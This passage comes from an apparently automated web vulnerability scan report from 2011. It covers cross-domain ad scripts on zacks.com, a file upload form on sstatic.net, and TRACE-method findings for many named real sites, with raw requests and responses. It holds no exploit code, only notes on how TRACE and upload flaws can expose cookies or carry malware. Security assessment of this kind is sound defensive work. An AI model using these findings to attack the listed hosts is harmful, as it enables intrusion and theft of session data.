User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296353052?"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296353052?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.660. http://www.zacks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296357590?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296357590?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296357590?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296357590?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296357590?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:50 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=v9l41qn4sfm5i3kja133sovjj3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=4ac75f419ad0fd716a2409a04430b66c; expires=Sun, 06-Feb-2011 03:19:50 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=4ac75f419ad0fd716a2409a04430b66c; expires=Sun, 06-Feb-2011 03:19:50 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 03:19:50 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 135895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296357590?"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296357590?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.661. http://www.zacks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296409714?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296409714?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296409714?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296409714?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296409714?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:48:34 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=e7js0gkplf59jff79ik50r1am6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=597eac166ff42894d51e61aee57128a8; expires=Sun, 06-Feb-2011 17:48:34 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=597eac166ff42894d51e61aee57128a8; expires=Sun, 06-Feb-2011 17:48:34 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 17:48:34 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 135362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296409714?"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296409714?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.662. http://www.zacks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296414829?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296414829?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296414829?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296414829?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296414829?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:49 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=61fk8pd6se6l39ij7o2j28tfb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=aea77f780fcb1525ac2486dbd36de044; expires=Sun, 06-Feb-2011 19:13:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=aea77f780fcb1525ac2486dbd36de044; expires=Sun, 06-Feb-2011 19:13:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 19:13:49 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 134779

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296414829?"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296414829?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

24. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sstatic.net
Path:	/Js/wmd.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://sstatic.net/upload/image

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

Response

25. TRACE method is enabled previous next
There are 32 instances of this issue:

http://advertising.aol.com/
http://amch.questionmarket.com/
http://atl.whitepages.com/
http://bassistance.de/
http://blogs.discovermagazine.com/
http://erik.eae.net/
http://eurekalert.org/
http://javascript.nwbox.com/
http://jquery.org/
http://msnbcmedia.redacted/
http://nasaengineer.com/
http://planetary.org/
http://seedmagazine.com/
http://trueslant.com/
http://widgets.digg.com/
http://www.aim.com/
http://www.batstrading.com/
http://www.cannex.com/
http://www.dooce.com/
http://www.interactivedata-rts.com/
http://www.mozilla.org/
http://www.popsci.com/
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.six-telekurs.com/
http://www.spacedaily.com/
http://www.stylemepretty.com/
http://www.terra.com/
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.unmannedspaceflight.com/
http://www.zacks.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

25.1. http://advertising.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/

Request

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: 409e035ad7de2fbd

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: advertising.aol.com
Cookie: 409e035ad7de2fbd
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

25.2. http://amch.questionmarket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6ce88e51721b33b9

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:39:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6ce88e51721b33b9
Connection: Keep-Alive

25.3. http://atl.whitepages.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/

Request

TRACE / HTTP/1.0
Host: atl.whitepages.com
Cookie: ed776e1c4467b782

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:27 GMT
X-DirectServer: whitepg_DS1
Content-Type: message/http
Content-Length: 72
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

TRACE / HTTP/1.0
Host: atl.whitepages.com
Cookie: ed776e1c4467b782

25.4. http://bassistance.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bassistance.de
Path:	/

Request

TRACE / HTTP/1.0
Host: bassistance.de
Cookie: 69191d9c42dd378e

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bassistance.de
Cookie: 69191d9c42dd378e

25.5. http://blogs.discovermagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.discovermagazine.com
Cookie: 301e5690c1ef0701

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.discovermagazine.com
Cookie: 301e5690c1ef0701

25.6. http://erik.eae.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://erik.eae.net
Path:	/

Request

TRACE / HTTP/1.0
Host: erik.eae.net
Cookie: 60cde813600d7a52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:15 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e mod_fastcgi/2.4.6 DAV/2 SVN/1.5.1 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: erik.eae.net
Cookie: 60cde813600d7a52

25.7. http://eurekalert.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://eurekalert.org
Path:	/

Request

TRACE / HTTP/1.0
Host: eurekalert.org
Cookie: e5159682a8af6bdf

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:14 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e5159682a8af6bdf
Host: eurekalert.org

25.8. http://javascript.nwbox.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://javascript.nwbox.com
Path:	/

Request

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: ee0c1f27c3164845

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:01:58 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: javascript.nwbox.com
Cookie: ee0c1f27c3164845

25.9. http://jquery.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/

Request

TRACE / HTTP/1.0
Host: jquery.org
Cookie: bf6a8c3e21a78d47

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.org
Cookie: bf6a8c3e21a78d47

25.10. http://msnbcmedia.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbcmedia.redacted
Path:	/

Request

TRACE / HTTP/1.0
Host: msnbcmedia.redacted
Cookie: d9e748ab16067d86

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sun, 30 Jan 2011 02:16:31 GMT
Content-Type: message/http
Content-Length: 111
Expires: Sun, 30 Jan 2011 02:16:31 GMT
Connection: close

TRACE / HTTP/1.0
Host: msnbcmedia.redacted
Cookie: d9e748ab16067d86
_FP_X_URL: http://msnbcmedia.redacted/

25.11. http://nasaengineer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nasaengineer.com
Path:	/

Request

TRACE / HTTP/1.0
Host: nasaengineer.com
Cookie: d1cac23b58b90b24

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:56 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 PHP-CGI/0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d1cac23b58b90b24
Host: nasaengineer.com

25.12. http://planetary.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://planetary.org
Path:	/

Request

TRACE / HTTP/1.0
Host: planetary.org
Cookie: c5c950d6171222e1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: planetary.org
Cookie: c5c950d6171222e1

25.13. http://seedmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seedmagazine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: seedmagazine.com
Cookie: 9622599b45620037

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:02 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: seedmagazine.com
Cookie: 9622599b45620037

25.14. http://trueslant.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trueslant.com
Path:	/

Request

TRACE / HTTP/1.0
Host: trueslant.com
Cookie: db3988582f75a100

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:15 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Connection: close
Content-Type: message/http
